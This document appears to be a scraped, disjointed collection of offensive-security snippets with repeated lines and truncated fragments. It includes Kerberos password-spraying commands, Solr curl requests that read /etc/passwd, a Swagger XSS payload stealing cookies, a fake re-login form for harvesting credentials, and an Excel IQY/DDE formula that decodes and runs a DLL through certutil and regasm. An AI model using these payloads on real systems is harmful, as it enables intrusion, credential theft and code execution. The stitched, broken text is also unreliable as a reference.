With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:
# ip="192.168.1.12:8983" | |
# curl -d '{"set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}}' http://$ip/solr/db/config -H 'Content-type:application/json' | |
# curl "http://$ip/solr/db/debug/dump?param=ContentStreams" -F "stream.url=file:///etc/passwd" |
POST /login.php5 HTTP/1.1
Accept: application/json
Connection: close
Content-Length: 100
Content-Type: application/json
{
"login_auth": 0,
"miniHiveUI": 1,
swagger: "2.0", | |
info: | |
title: "Swagger Test Poc XSS", | |
description: "Please to click Terms of service" | |
termsOfService: "javascript:alert(document.cookie)" | |
contact: | |
name: "API Support", | |
url: "javascript:alert(document.cookie)", | |
email: "javascript:alert(document.cookie)" | |
version: "1.0.1" |
{ | |
"flags": "-HanrPz", | |
"pattern": "('|\")SELECT[\\S+\\n\\r\\s]+FROM[\\S+\\n\\r\\s]+('|\").*(\\.|\\{).*[\\S+\\n\\r\\s]+;" | |
} |
var html = ` | |
<div id=\"bg\" style=\"position: absolute; z-index: 100; width: 100%; height: 100%; background-color: #000000; opacity: 0.5; top: 0; left: 0; margin: 0\"> | |
</div> | |
<div id=\"form\" style=\"position: absolute; z-index: 150; font-family: Arial; background-color: #ffffff; width: 280px; height: 185px; top: 50%; left: 40%; padding: 10px\"> | |
<p>An error occurred. Please login again.</p> | |
<form id=\"phishingForm\""> | |
<p>Username <input type=\"text\" name=\"username\"></p> | |
<p>Password <input type=\"password\" name=\"password\"></p> | |
<p><input type=\"submit\" value=\"Login\"></p> | |
</form> |
# -*- coding: UTF-8 -*- | |
from ctypes.wintypes import * | |
from ctypes import * | |
from enum import IntEnum | |
# These libraries have the APIs we need | |
kernel32 = WinDLL('kernel32', use_last_error=True) | |
advapi32 = WinDLL('advapi32', use_last_error=True) | |
psapi = WinDLL('psapi.dll', use_last_error=True) |
WEB | |
1 | |
https://ringzer0team.com/IQY | |
Selection=EntirePage | |
Formatting=RTF | |
PreFormattedTextToColumns=True | |
ConsecutiveDelimitersAsOne=True | |
SingleBlockTextImport=False | |
DisableDateRecognition=False |
=cmd|' /c more /E +12 %userprofile%\Downloads\poc.iqy > %temp%\poc.hex && certutil -decodehex %temp%\poc.hex %temp%\poc.dll && C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U %temp%\poc.dll'!'A1' |
function Get-NonstandardService { | |
<# | |
.SYNOPSIS | |
Returns services where the associated binaries are either not signed, or are | |
signed by an issuer not matching 'Microsoft'. | |
Author: Will Schroeder (@harmj0y) | |
License: BSD 3-Clause | |
Required Dependencies: None |